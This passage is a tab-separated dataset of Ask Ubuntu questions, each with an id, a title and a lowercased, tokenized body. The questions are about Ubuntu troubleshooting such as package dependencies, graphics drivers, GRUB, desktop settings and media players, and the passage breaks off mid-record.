499523	what is difference between commands ( like : cat , ls , cp ) and gvfs commands ?	i recently found following gvfs commands : gvfs-cat ( 1 ) - concatenate files gvfs-copy ( 1 ) - copy files gvfs-info ( 1 ) - show information about files gvfs-ls ( 1 ) - list files gvfs-mime ( 1 ) - get or set mime handlers gvfs-mkdir ( 1 ) - create directories gvfs-monitor-dir ( 1 ) - monitor directories for changes gvfs-monitor-file ( 1 ) - monitor files for changes gvfs-mount ( 1 ) - mounts the locations gvfs-move ( 1 ) - copy files gvfs-open ( 1 ) - open files with the default handler gvfs-rename ( 1 ) - rename a file gvfs-rm ( 1 ) - delete files gvfs-save ( 1 ) - save standard input gvfs-set-attribute ( 1 ) - set file attributes gvfs-trash ( 1 ) - move files or directories to the trash gvfs-tree ( 1 ) - list contents of directories in a tree-like format now , how it differs with commands like cat , cp , mkdir etc . in other words what is difference with following commands respectively ? cat and gvfs-cat cp and gvfs-copy mkdir and gvfs-mkdir etc . and so on . or what gvfs-* commands stands for ?
499524	how to install ffmpeg on ubuntu 14.04 ( 32-bit ) ?	when i try : sudo apt-get install ffmpeg i get : reading package lists ... done building dependency tree reading state information ... done package ffmpeg is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ffmpeg ' has no installation candidate and i do n't know how to install ppa packages .
499532	how to make the rule to make tahoma italic to be slant ?	how to make the rule to make tahoma italic to be slant ? this does not works in 14.04 but worked in 13.04 : > < edit name= '' antialias '' > < bool > false < /bool > < /edit > > > < match target= '' font '' > < test compare= '' more_eq '' > name= '' slant '' > < const > italic < /const > < /test > < edit > name= '' antialias '' > < bool > true < /bool > < /edit > < /match > thanks
499533	administrative password does n't work when i try to install applications	i have a problem . when i try to install something from the software center it tells me my password is incorrect . in my account , i just changed my password to 'none ' , since i do n't want to be prompted any time i turn on my computer . however when in software center , even when i press enter ( not type any password in ) it still does n't let me download - 'your authentication attempt was unsuccessful . please try again ' . i also tried with my passphrase .
499534	gateway laptop not booting ubuntu from usb	i have a gateway mx8738 and when i try to boot my usb with the ubuntu iso on it it does n't work . the post screen stays stuck loading . does the .iso need to be in a different format or do there have to be other files on the flash drive ? when i try to start windows up normally i get a blue screen of death . i 'm not sure if there 's a hardware issue or not but once i try to boot from usb the stick blinks once and nothing happens . any help would be greatly appreciated . if this is the wrong place please redirect me somewhere appropriate . thank you very much !
499537	is there a way to use vdpau with the proprietary ( fglrx ) amd drivers ?	i 've got a relatively low-powered htpc running ubuntu 13.10 , sporting a radeon 6450 for graphics acceleration . i 'm using the 14.6 beta of the proprietary ( catalyst/fglrx ) this machine is presently used for : i 've noticed very poor streaming performance in steam , and tests with other devices on my network suggest that the problem is that steam ca n't leverage hardware decoding on my 6450 . the fglrx drivers only provide xvba , and steam , apparently , only supports vdpau . i 'd prefer to stick with fglrx , but so far i have n't found any instructions on setting up vdpau under fglrx -- though some people have suggested that xvba could be used as a vdpau backend . is there any way to accomplish this , or will i have to use the open source radeon driver ?
499540	how can i get persistent output from apt-listchanges without intervention ?	i have installed and configured apt-listchanges to output the changelogs of downloaded updates after-the-fact . output of cat /etc/apt/listchanges.conf : [ apt ] frontend=xterm-pager email_address= confirm=0 which=both it 's a bit difficult to test different configurations , because it relies on updates coming through . so far , however , no configuration results in an output that remains on the screen after the update is complete . for example : if i choose the browser option and firefox is already running , it fails if i choose the xterm or gtk window option , the new window appears , but disappears when the update is complete if i choose the option to display text in the same terminal , even without the option to confirm before applying , i must quit the display before the update continues if i use update manager rather than the command line , it never works and throws an error ( although the update is applied ) how can i configure apt-listchanges and apt upgrade ( or update manager ) to : download and apply updates without interruption or intervention required ( that is , no confirmation prompt from apt-listchanges ) display the news/changelogs on the screen ( same terminal , different terminal , gtk window , browser window , update manager , i do n't mind , but not email ) have the display persist beyond the completion of the update ( as a last ditch attempt , output to a text file would n't be a terrible option . )
499543	trying to run compiz on xubuntu 14.04	okay , i had compiz running on xubuntu 14.04 on a previous install but for some reason the fresh install i did last night wo n't let me get it running . it seems like compiz ca n't read any configuration options and it acts as if i just installed every time i open ccsm . even to the point that it asks if i want to display the warning screen again . i 've installed dconf-editor and gconf-editor . i 've gone back and forth with the backend settings option in ccsm and it reloads all my settings when i switch to gsettings backend but once i run `` compiz -- replace '' i get no borders or effects . if there 's any other info i can give to help diagnose just let me know . edit : i figured this out . i fixed the issue by editing /etc/compizconfig/config as root and manually changed the backend to gsettings under the general heading . for good measure i also changed the profile to my custom one . now compiz starts up and everything works as expected .
499550	how can i hide chrome apps from the unity dash ?	it annoys me that chrome dumps all the chrome apps that are installed into the unity dash ( note : i mean apps , not the shortcuts you can install ) . i have tried to use alacarte to hide the chrome apps section , but after unchecking said section , or just seperate apps , and restarting the computer they still appear in the dash . i do not want to uninstall them , i just want to find a way to hide them from popping up in the dash 's applications menu . has anyone figured out how to achieve this ?
499551	how do i delete files on ubuntu ?	can anyone give me a simple answer as to how i can delete files on ubuntu ? i have tried seeing if there was a delete option when selecting a file , but it does n't show .
499555	how to make transmission work for all users	i tried opening a magnet link from a different ( standard ) user i created and it did n't work . it asked me to choose a program to open it with . there was no list of programs to choose from . i also tried browsing for programs , but i could n't find it .
499562	what script runs when locally logging in to ubuntu 14.04 ?	in ubuntu 12.04 , i had line in .profile that maps the backtick key to 's ' because my 's ' key sticks ( do n't judge me ! ) which worked fine until i updated to 14.04 . now , it apparently no longer sources .profile at login , because i need to run the mapping command at the terminal every time i log in -- even just from suspend . since .profile apparently does n't work now , is there another file i can put the command into that does the same thing ?
499563	ca n't set `` alt+ctrl+t '' to launch terminal in xfce4	i followed normal steps to assign alt+ctrl+t to open a terminal window . ( menu > settings manager > keyboard > application shortcuts > add and follow steps ) but it just does n't seem to work . i was following this and some other sources . why is n't it working ? how do i make it work ?
499571	nvidia-settings closes after applying settings instead of applying them	i have a problem with my ubuntu system . the nvidia proprietory driver does n't work anymore as it should . i freshly installed ubuntu just a few moments ago and the first thing i did was update ubuntu and then install the nvidia drivers . i rebooted my pc and now when i applu when changing settings in the 'nvidia x server settings ' it closes and does n't set my changes . i tried to start the nvidia-settings using root aswell but to no avail . could anyone please advice me what i should do now ? thx in advance . ps . if anyone knows how to set the nvidia settings permanently i would really appreciate it , do n't need to reset my settings all the time because i am the only one using this computer .
499572	how to reenable unity - tried the standard stuff	while going through my compiz settings , i noticed , that windows decarator is off , and i clicked to turn it on - then clicked yes , before i 've read that this will turn off unity . i tried reenabling it using steps like here : http : //www.webupd8.org/2012/10/how-to-reset-compiz-and-unity-in-ubuntu.html unity does n't load , no launcher , no dash appears and some others , but this does n't help . unity supported command confirms , that it is supported on my machine . my system is ubuntu 14.04 . currently i can see that unity is enabled in ccsm settings ( and decorator disabled ) , but i have no launcher , no upper bar , no side bar , no windows title bar , nothing . just the desktop . of course i tried restaring my computer , pluging it off and on again , etc ; )
499578	vlc : unattended video playback of sporadic udp video source ?	i want to make a kiosk-type setup that simply plays back video from a remote udp source . the command line below does the trick and shows the video ok when there 's an incoming signal to begin with . i set it up to execute as a startup app of a desktop user with auto-login : vlc -f udp : // @ : portnumber but if there 's no video when the machine starts , it shows the vlc screen with its window decorations and dashboard . worse , it shows the unity taskbar . i would like it to always show a black screen ( or as close to featureless as possible ) , and i need the black screen to remain when there 's no signal coming , and the video to come up when the signal comes back . i 'm kind of lost in vlc 's infinitely many command-line options . any help would be highly appreciated . i 'm open to using a different video player if it will do the job better .
499580	can not access disk settings for external usb drive and drive does not sleep	i have a seagate plus 4 tb external usb 3.0 hard drive and am running stock ubuntu 14.04 64-bit . the os is running on my internal hard drive . external is for backups . i always had my drive set to sleep after 15 minutes in the hard drive settings in the gnome disks program . i noticed my drive was not going to sleep lately so i checked disks and saw that the settings option as well as the smart drive options are grayed out . i am still able to access both settings for my internal drive . how do i get these back for my external drive ?
499581	my lap top temparetures are going up	i have installed tlp and started but find no change in temp . this is the result after running sensors command on terminal . radeon-pci-0100 adapter : pci adapter temp1 : +511.0°c ( crit = +120.0°c , hyst = +90.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +44.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +44.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +40.0°c ( high = +87.0°c , crit = +105.0°c ) why is my radeon-pci-0100 adapter : pci adapter temp1 : +511.0°c is showing this status almost all the time ?
499586	holding down windows key does n't show unity shortcuts 14.04	i am running an hp laptop with intel hd graphics with ubuntu 14.04 lts 64-bit . some days ago when i pressed the windows key it would show the unity shortcuts , now when i press it it just shows the numbers but no shortcuts like before . i already have enable shortcuts hints overlay selected in the compizconfig manager and still no luck . please help , i really want to get them back .
499588	how to resolve unmet dependencies `` libgles2-mesa : depends : libglapi-mesa ( = 8.0.4-0ubuntu0.7 ) ''	how can i fix this issue : libgles2-mesa : depends : libglapi-mesa ( = 8.0.4-0ubuntu0.7 ) i have already installed libglapi-mesa . $ sudo apt-get install libgles2-mesa reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : libgles2-mesa : depends : libglapi-mesa ( = 8.0.4-0ubuntu0.7 ) e : unable to correct problems , you have held broken packages . $ sudo apt-get install libglapi-mesa reading package lists ... done building dependency tree reading state information ... done libglapi-mesa is already the newest version . the following packages were automatically installed and are no longer required : libts-0.0-0 libmodplug1 libtwolame0 libva-x11-1 libzvbi-common libx264-120 libbluray1 libzvbi0 libxcb-xv0 libtar0 libdca0 libwebkitgtk-1.0-common libterm-readkey-perl libiso9660-8 libcddb2 libass4 libdvbpsi7 libdirectfb-1.2-9 libjavascriptcoregtk-1.0-0 libsdl-image1.2 libenca0 libresid-builder0c2a libupnp3 libaacs0 libmatroska5 libxcb-keysyms1 liba52-0.7.4 libdvdnav4 libdvdread4 libxcb-composite0 libkate1 libjpeg62 libsidplay2 gir1.2-rsvg-2.0 tsconf libwebkitgtk-1.0-0 libmad0 python-support libdirac-encoder0 libsvn-perl libvcdinfo0 libebml3 libmpcdec6 libcrystalhd3 libmpeg2-4 libxcb-randr0 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 695 not upgraded . this is the output of sudo apt-cache policy libglapi-mesa : $ sudo apt-cache policy libglapi-mesa libglapi-mesa : installed : 9.0-0ubuntu1 candidate : 9.0-0ubuntu1 version table : *** 9.0-0ubuntu1 0 100 /var/lib/dpkg/status 8.0.4-0ubuntu0.7 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 8.0.4-0ubuntu0.6 0 500 http : //archive.ubuntu.com/ubuntu/ precise-security/main amd64 packages 8.0.2-0ubuntu3 0 500 http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages and i have read how do i resolve unmet dependencies ? , but that does not solve my problem .
499591	system info dialog source ?	i 'd like to know where i could find ( in launchpad preferably ) the source code of this dialog . thanks in advance .
499593	how to stop ubuntu 14.04 from logging me out	i just recently installed ubuntu 14.04 in both my laptop and desktop windows 7 computers . now if i walk away from my work for a few minutes , i 'm logged out . at times the screen begins to fade when i pause to think of a word . i then have to quickly move the mouse or it will log me out . how do i fix this problem on both computers ?
499597	minimum usb requirement for persistent ubuntu	i need to install ubuntu and kali linux on usb sticks . before that , what 's the minimum requirement that a usb stick should have ( for best performance ) ? for example , read/write speed . thanks in advance .
499601	how to bridge skype and empathy in ubuntu 14.04	can some one help me to bridge between empathy and skype ? i followed every post from here and google . but it 's not working . there is no option for skype in gnome-account . i have installed pidgin-skype and telepathy-haze . also i am using skype 4.2 . i revert back from 4.3 to 4.2 . linux skype is a crap . i want to use skype using other messenger ui . i also tried wine but no luck . i found that latest version of skype ca n't be run in wine . finally system info : ubuntu 14.04 64bit unity 7.2.1 empathy 3.8.6 skype 4.2
499602	web page loading issues	i am currently working in ubuntu 14.04 & trying to access a web page using firefox & chrome both but its not loading the web page . i am getting the error like the connection has timed out the server at omappedia.org is taking too long to respond . the site could be temporarily unavailable or too busy . try again in a few moments . if you are unable to load any pages , check your computer 's network connection . if your computer or network is protected by a firewall or proxy , make sure that firefox is permitted to access the web . try again.. i am facing this problem for last 2 weeks . is there any solution for this problem .
499604	sqlite3 - humongous dependency list ?	$ sudo apt-get install sqliteman* sqlite3* gives me a display that includes this : ... recommended packages : bacula-sd-mysql bacula-sd-tools cl-sql-backend ada-reference-manual gdb-minimal php-http-oauth the following new packages will be installed : ada-reference-manual-2005 akonadi-backend-mysql akonadi-backend-sqlite akonadi-server aolserver4-core aolserver4-daemon aolserver4-doc aolserver4-nssqlite3 apache2 apache2-bin apache2-data autoconf automake ... texlive-xetex tidy tinymce tipa tk8.5 tntdb-sqlite4 tree tzdata-java ulogd ulogd-sqlite3 ulogd2 ulogd2-sqlite3 uwsgi-core uwsgi-plugin-sqlite3 vim vim-addon-manager vim-runtime wx-common wx2.8-headers wxsqlite3-2.8-dbg wxsqlite3-doc zabbix-proxy-sqlite3 zend-framework zend-framework-bin ... 0 upgraded , 797 newly installed , 0 to remove and 0 not upgraded . need to get 1 329 mb of archives . after this operation , 3 926 mb of additional disk space will be used . do you want to continue ? [ y/n ] checking the list i see among others 'tex , ruby , r-cran , php . openjdk , ocaml , mysql , mono , lua , libreoffice , libjs , libghc , latex , gnustep , gcc-4.6 , autotools , bacula . apache2 , aolserver , ... ' this list seems so overly long and content-rich that i said no for that install . anyone with insight here ? all i want is to get `` up and running '' on sqlite3 ( and nothing else ) . i 'm a bit of a beginner on sql , but see the usefulness both in private projects and at work . in the end , the basic question : is there some way to reduce that list to a more reasonable one ?
499606	team fortress 2 wo n't launch ?	so , i recently installed bumblebee on my computer , running 12.04 lts . i used the optirun command to launch steam , and it worked just fine . i try to launch team fortress 2 within steam , it 'll play one note of the intro video , and then crash . the terminal error reads : the program 'hl2_linux ' received an x window system error . this probably reflects a bug in the program . the error was 'badwindow ( invalid window parameter ) ' . ( details : serial 139 error_code 3 request_code 15 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) missing shutdown function for devshotgenerator_init ( ) : devshotgenerator_shutdown ( ) missing shutdown function for mapreslistgenerator_init ( ) : mapreslistgenerator_shutdown ( ) missing shutdown function for com_initfilesystem ( m_startupinfo.m_pinitialmod ) : com_shutdownfilesystem ( ) missing shutdown function for steam3client ( ) .activate ( ) : steam3client ( ) .shutdown ( ) /home/kelerak/.local/share/steam/steamapps/common/team fortress 2/hl2.sh : line 67 : 3248 segmentation fault ( core dumped ) $ { game_debugger } `` $ { gameroot } '' / $ { gameexe } `` $ @ '' game removed : appid 440 `` team fortress 2 '' , procid 3248 and then it goes to repeat this phrase : ( steam:2816 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . does anybody know what 's going on ?
499607	how to get shaders in 3.3 verion on intel hd 4000 with ubuntu ? ( opengl )	i made everything with this instructions : http : //stackoverflow.com/questions/14123895/opengl-glsl-3-3-on-an-hd-graphics-4000-under-ubuntu-12-04 and glxinfo | grep opengl answers : opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge mobile opengl core profile version string : 3.3 ( core profile ) mesa 10.3.0-devel ( git-f14d217 trusty-oibaf-ppa ) opengl core profile shading language version string : 3.30 opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 3.0 mesa 10.3.0-devel ( git-f14d217 trusty-oibaf-ppa ) opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : i want to make project in opengl and i want to shaders in version 3.3 . it is possible on my computer ( asus s200e ) ?
499608	transmission download does n't work when on other user	transmission does n't work when on other user of the computer . same magnet link , from the same website downloads when i use the computer as administrator , and does n't work when i use it from a different user account . all trackers say 'connection failed ' . how can i fix that ?
499610	how do i reboot into bootmenu from terminal	my laptop has this fast boot function that i cant turn off and it just starts booting into ubuntu instantly from a fresh start . so im wondering is there a terminal command to reboot into the bootmenu ? thanks
499611	can i run this on a usb hard drive on my desktop that is currently running windows xp i do not have enough space to partition my drive ?	can i run this on a usb hard drive on my desktop that is currently running windows xp i do not have enough space to partition my drive ?
499613	terminal shortcut to go to beginning of command ?	for example , forgetting to put sudo and having to go back to the beginning of the command .
499617	workaround for the xfce indicator plugin	the xfce `` indicator plugin '' keeps crashing with almost all apps . however i need it . i just want it to keep trying to restart itself automatically ( preferably every 10 seconds ) instead of displaying this annoying message plugin `` indicator plugin '' unexpectedly left the panel , do you want to restart it ? does anyone have an idea about how to do this ?
499618	how can i connect my nokia lumia 520 with ubuntu 14.04 ?	i can not seem find a way to connect a nokia lumia 520 to ubuntu 14.04 . i tried several solutions posted on the internet , but i could not find the right one . has someone achieved this ?
499620	how do i display google chrome 's menus in xubuntu ? i ca n't find them	i ca n't file the `` file edit view ... '' menus in google chrome in xfce ( xubuntu ) ! how do i display them or where are they ? ... i 'm surprised i 'm asking such a question xd
499630	unable to access or mount ipod touch [ ubuntu 14.04 ]	on attaching the ipod touch ubuntu throws a message `` unable to mount [ name ] 's ipod touch '' with a sub message : `` unable to connect . '' i have been unable to pinpoint any specific troubleshooting or workarounds for this . ( if it helps - the device has recently been reset/erased and then re-setup , it worked before the reset )
499632	is it possible to run update-grub on a disk image ?	i have created a script to run update-grub on an ubuntu-14.04 disk image . the code is shown below : # ! /bin/bash if [ $ # -ne 2 ] then echo `` usage : $ 0 mount-point disk-image '' echo `` example : $ 0 mount ubuntu.hdd '' exit 255 fi mount= $ 1 hdd= $ 2 cfg=/boot/grub/grub.cfg if [ ! -e `` $ mount '' ] then echo `` directory $ mount does not exist '' exit 255 fi rootoffset=537919488 mount -o loop , offset= $ rootoffset $ hdd $ mount mount -- bind /dev $ mount/dev mount -- bind /proc $ mount/proc mount -- bind /sys $ mount/sys chroot $ mount grub-mkconfig -o $ cfg umount $ mount/dev umount $ mount/sys umount $ mount/proc umount $ mount the usage for the script is as follows : mkdir mnt sudo ./update-grub.img ubuntu.hdd the script terminates with the following message : generating grub configuration file ... /usr/sbin/grub-probe : error : failed to get canonical path of `/root/hdd/ubuntu.hdd ' . no path or device is specified . usage : grub-probe [ option ... ] [ option ] ... [ path|device ] try 'grub-probe -- help ' or 'grub-probe -- usage ' for more information . any suggestions on how to correctly run update-grub on a loopback mounted disk image ?
499633	del key not working	i am new to ubuntu and have just installed ubuntu 14.04 on my laptop . until the day before yesterday , the delete key was working , but suddenly it has stopped working . i have tried to restart the pc , but it did n't work . shift + delete deletes permanently . can anybody please guide me how can i get the delete key working again .
499636	ubuntu server - will it run oracle instant client ?	we are looking to build a scripting server . will ubuntu server run the following software ? need ftp access and ability to chmod folders also : php 5.5 curl mysql phpmyadmin â preferably version 3.3.9 due to ability to export as .xlsx mcrypt oci8 with oracle instant client 10.2.0.5.0 ( newer versions can not query certain databases ) phpexcel soap pear mail all the lamp software , i am good with , the oracle instant client , i am concerned about . any suggestions on platform ? red hat vs , ubuntu server ? thank you .
499637	new windows very slow to launch	this problem shows up a day or two after rebooting . launching any new window will be very slow . it comes up first with either just a transparent overlay or with the window grayed out and the rest of the system stalled . after maybe 30s to a minute the window will eventually show up fully . at that point everything works fine with no noticeable performance problems , until i need to launch another window . also whenever i hit this problem , i also ca n't do anything within the system tray . the clock in the tray even stops updating . the system tray stays frozen whether i 'm stuck launching a window or not . i do n't see anything helpful or even recent in dmesg . top does n't show anything too unusual in cpu or mem usage , although i do n't think its display is updating while the system is frozen waiting for a window to open . reboot and everything 's back to normal . also this problem shows up suddenly . by that i mean everything is normal and then i try to open a window and its very slow to load . its not like opening windows gradually gets slower over time . this is on 14.04 , nvidia 331 driver , unity .
499638	[ errno 30 ] read-only file system : '/target/boot/vmlinuz-3.13.0-24-generic '	i am fairly new to ubuntu and i am trying to install 14.04 on my laptop . the laptop was n't really working and only boots with ubuntu cd . i do n't care for any files or anything on the computer , i just want to get a working system installed on my computer . when trying to install ubuntu i get : the installer encoutered an error copying files to the hard disk : [ errno 30 ] read-only file system : '/target/boot/vmlinuz-3.13.0-24-generic' this is often due to a faulty hard disk . it may help to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . any help would be greatly appreciated .
499640	how can i get a music player to watch a folder for new files ?	i am using youtube-dl to download a series of short audio files . how can i set up a common music player [ 1 ] to monitor a given folder for new files and add them to the current playlist ? [ 1 ] rhythmbox , totem , vlc , or anything available in the 14.04 repos and usable in unity .
499641	desktop cube graphical errors on macbook pro	okay , so i was recently fiddling around with ccsm and the desktop cube , and i enabled it , but the cube ( or should i say sphere , since i changed it ) has odd graphics . here is a video of it acting weird : http : //youtu.be/uhiwok6iehm
499643	which version of ubuntu should i install under virtualbox in os x 10.9 ?	i 'm planning to install ubuntu in a virtualbox virtual machine . the host operating system is os x 10.9 mavericks running on a mid-2012 macbook pro . the download page instructs me to choose between the flavours `` 64-bit '' and `` 64-bit mac ( amd64 ) '' . what is the difference between these two versions ? which of these versions is appropriate for my planned installation ?
499644	why are captchas so hard to read ?	i have tried to make an account about 1000 times and it says always `` wrong captcha solution '' ... even i have thought that i have good sight looks like its impossible . why ca n't they just make captcha solutions a little bit easier to read ! ?
499646	enable horizontal scroll 14.04	my laptop is acer v3-571g with default settings , except for enabling brightness controls , as instructed here . horizontal scrolling is not working . instead , while holding alt key , it switches trough windows . i followed instruction as described here , but horizontal scrolling option was already enable . also , tried this . referred here on how to enable horizontal workspace switcher , and tried to do the opposite , but still it did not work .
499649	write on dvd not working on dell 2400	i am using ubuntu 14.04 lts operating system . my dell 2400 has two drives a cd/dvd drive hl-dt-st cdd-rw/dvd-rom ccc-4480 b3 and a cd drive samsung cd-r rw sw-2525 neither one sees a blank dvd when i try to write to disk an 12.04 iso or 14.04 iso but when i put a blank cd in it tells me that not enough space . can you help
499653	how do i run synfig studio ? it wo n't open	i installed synfig studio , and when i opened it , it would n't open . i am using the latest version of both ubuntu and synfig studio . thanks edit : to anyone trying to fix this , the answer is simple . the default command for opening synfig studio is $ synfigstudio # f , change it to just $ synfigstudio , and it will work .
499656	what is the difference between postfix and mailsutils ?	i am attempting to set up an aws ec2 with a simple mailing service for my crontab . and i have postfix set up , but when i used the `` mail '' command it did not work . so i installed mailutils as ubuntu suggested . my question is what is the difference between the two programs ? is postfix a mailing agent while mailutils is a client ? edit : everything is working now , i am curious just about the difference .
499658	issue with ports.ubuntu.com	starting from ubuntu desktop image downloaded from radxa site : http : //dl.radxa.com/rock/images/ubuntu/radxa_rock_ubuntu_desktop_140318_update.zip i installed linaro on my radxa . i did n't change the sources . i 'm trying to install apps through synaptics and apt-get install . it seems the source ports.ubuntu.com is down or wrong for some libraries ( armhf especially ) . i am receiving a 404 error message telling it is not possible to fetch the files . so , i 'm not able to install anything . some weeks ago it was working fine ... . please find the error log : rock @ radxa : ~ $ sudo apt-get update ign http : //ports.ubuntu.com raring release.gpg hit http : //ppa.launchpad.net raring release.gpg hit http : //ppa.launchpad.net raring release ign http : //ports.ubuntu.com raring release ign http : //ports.ubuntu.com raring/main sources/diffindex hit http : //ppa.launchpad.net raring/main sources ign http : //ports.ubuntu.com raring/universe sources/diffindex hit http : //ppa.launchpad.net raring/main armhf packages ign http : //ports.ubuntu.com raring/main armhf packages/diffindex hit http : //ppa.launchpad.net raring/main/debug armhf packages ign http : //ports.ubuntu.com raring/universe armhf packages/diffindex ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main/debug translation-en ign http : //ports.ubuntu.com raring/main translation-en ign http : //ports.ubuntu.com raring/universe translation-en err http : //ports.ubuntu.com raring/main sources 404 not found [ ip : 91.189.88.140 80 ] err http : //ports.ubuntu.com raring/universe sources 404 not found [ ip : 91.189.88.140 80 ] err http : //ports.ubuntu.com raring/main armhf packages 404 not found [ ip : 91.189.88.140 80 ] err http : //ports.ubuntu.com raring/universe armhf packages 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/raring/main/source /sources 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/raring/universe/source/sources 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/raring/main/binary-armhf/packages 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/raring/universe/binary-armhf/packages 404 not found [ ip : 91.189.88.140 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . rock @ radxa : ~ $ i obtain similar error if i try to install something , with sudo apt-get install vlc for example what 's the issue ? the same image was working 1 week ago .
499660	tomb raider 2013 steam wine - how to compile wine patch ?	i wanted to install tomb raider 2013 over steam with wine 1.7.22 . the problem is , that the game stops after the profile loader . this problem is well known : https : //appdb.winehq.org/objectmanager.php ? sclass=version & iid=27776 & sallbugs the solution is to patch the wine source code and compile then . i tried to patch the source code with patch -p1 < patch.diff . the output was : patching file dlls/kernel32/sync.c hunk # 1 failed at 456 . 1 out of 1 hunk failed -- saving rejects to file dlls/kernel32/sync.c.rej if i go to sync.c and change the code myself , the generated wine executable is extremely unstable , produces windows without text and buttons and more issues ... can anyone hekp me maybe ? thankyou !
499662	how to disable popup `` close this terminal ? '' when closing terminal ?	each time when i want to close terminal there is a popup with question `` close this terminal ? '' because some process is running in terminal . i do n't care about this process . how to prevent terminal from showing this popup ?
499663	unity-control-center uninstalled itself	i do n't know how it got uninstalled since i had it before , but when i try to install it again i get the following error : oierlauzi @ akerbeltz : ~ $ sudo apt-get install unity-control-center reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : unity-control-center : depends : libcheese-gtk23 ( > = 3.4.0 ) but it is not going to be installed depends : libcheese7 ( > = 3.0.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i have read several answers but none have solved my issue . i also could not solve it by using aptitude .
499664	can i uninstall gnome ?	i have ubuntu 14.04 with unity as de installed on my pc . but i recently found out that gnome de is installed , too . i do n't need gnome , never use it , so i wannt to remove it . can i do this without causing damage to unity ? are there any packages that belong to gnome but are used by unity as well ?
499671	joining and authenticated by windiws active directory in ubuntu 14.04 client	is there a easy gui based tool to join windows active directory ? i have read about `` likewise '' but does it work with ubuntu 14.04 ? it is not showing in my software centre . also in their website 14.04 is not listed ! ref : https : //apps.ubuntu.com/cat/applications/precise/likewise-open-gui/ do we have similar alternative to `` likewise '' ? thank you in advance .
499675	how to change color in gtk theme ?	after upgrading from saucy to trusty my favourite app ghex has become ugly ( and some other apps too ) the border color has become absolutely black ( # 000000 ) . i want to set another color , but where ? i was searching in /usr/share/themes/ambiance but there were only one file with only one line of this color . i edited it to something differnt . then swithced in system options theme from ambiance to adwaita and then again to ambiance - nothing changed . see the screenshot below
499678	and error message says `` could not initialize package information ''	and error message says `` could not initialize package information '' e : encountered a section with no package : header e : problem with mergelist ? var ? lib/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_ ! 18n_translation-en e : the package list of status could not be parsed opened . ubuntu 12.04 lts what do i do ?
499680	how can i install nvidia-331-updates without automatically installing a full-fledged unity desktop ?	i 'm trying to run xbmc from an ubuntu 14.04 sever install . in order for my hdmi audio to function properly , i require the latest nvidia drivers , located in package nvidia-331-updates . here is the full list of packages that are automatically installed when i run sudo apt-get install nvidia-331-updates : the following extra packages will be installed : apg aptdaemon aspell aspell-en avahi-utils bbswitch-dkms bluez cheese-common cracklib-runtime cups-pk-helper dbus-x11 dconf-cli desktop-file-utils dialog diffstat dnsmasq-base enchant evolution-data-server evolution-data-server-common evolution-data-server-online-accounts gconf-service gconf-service-backend gconf2 gconf2-common gcr gdisk geoclue geoclue-ubuntu-geoip gettext gir1.2-atk-1.0 gir1.2-freedesktop gir1.2-gdkpixbuf-2.0 gir1.2-gnomebluetooth-1.0 gir1.2-gtk-3.0 gir1.2-ibus-1.0 gir1.2-notify-0.7 gir1.2-packagekitglib-1.0 gir1.2-pango-1.0 gkbd-capplet glib-networking glib-networking-common glib-networking-services gnome-bluetooth gnome-control-center-shared-data gnome-desktop3-data gnome-icon-theme gnome-icon-theme-symbolic gnome-keyring gnome-menus gnome-power-manager gnome-screensaver gnome-session-bin gnome-settings-daemon-schemas gnome-user-guide gnome-user-share gsettings-desktop-schemas gsettings-ubuntu-schemas gstreamer0.10-pulseaudio gstreamer1.0-clutter gstreamer1.0-plugins-base gstreamer1.0-plugins-good gstreamer1.0-x gvfs gvfs-backends gvfs-common gvfs-daemons gvfs-libs hardening-includes humanity-icon-theme hunspell-en-us hwdata ibus ibus-gtk ibus-gtk3 im-config indicator-applet indicator-application indicator-bluetooth indicator-datetime indicator-keyboard indicator-messages indicator-power indicator-session indicator-sound intltool-debian iputils-arping libaa1 libaccount-plugin-1.0-0 libaccount-plugin-generic-oauth libaccount-plugin-google libaccounts-glib0 libaccounts-qt5-1 libappindicator3-1 libapt-pkg-perl libarchive-zip-perl libarchive13 libasound2-plugins libaspell15 libasprintf-dev libauthen-sasl-perl libautodie-perl libavahi-glib1 libavc1394-0 libcamel-1.2-45 libcanberra-gtk3-0 libcanberra-gtk3-module libcanberra-pulse libcanberra0 libcdio-cdda1 libcdio-paranoia1 libcdparanoia0 libcheese-gtk23 libcheese7 libclone-perl libclutter-1.0-0 libclutter-1.0-common libclutter-gst-2.0-0 libclutter-gtk-1.0-0 libcogl-common libcogl-pango15 libcogl15 libcrack2 libcroco3 libcuda1-331-updates libdbusmenu-glib4 libdbusmenu-gtk3-4 libdigest-hmac-perl libdv4 libebackend-1.2-7 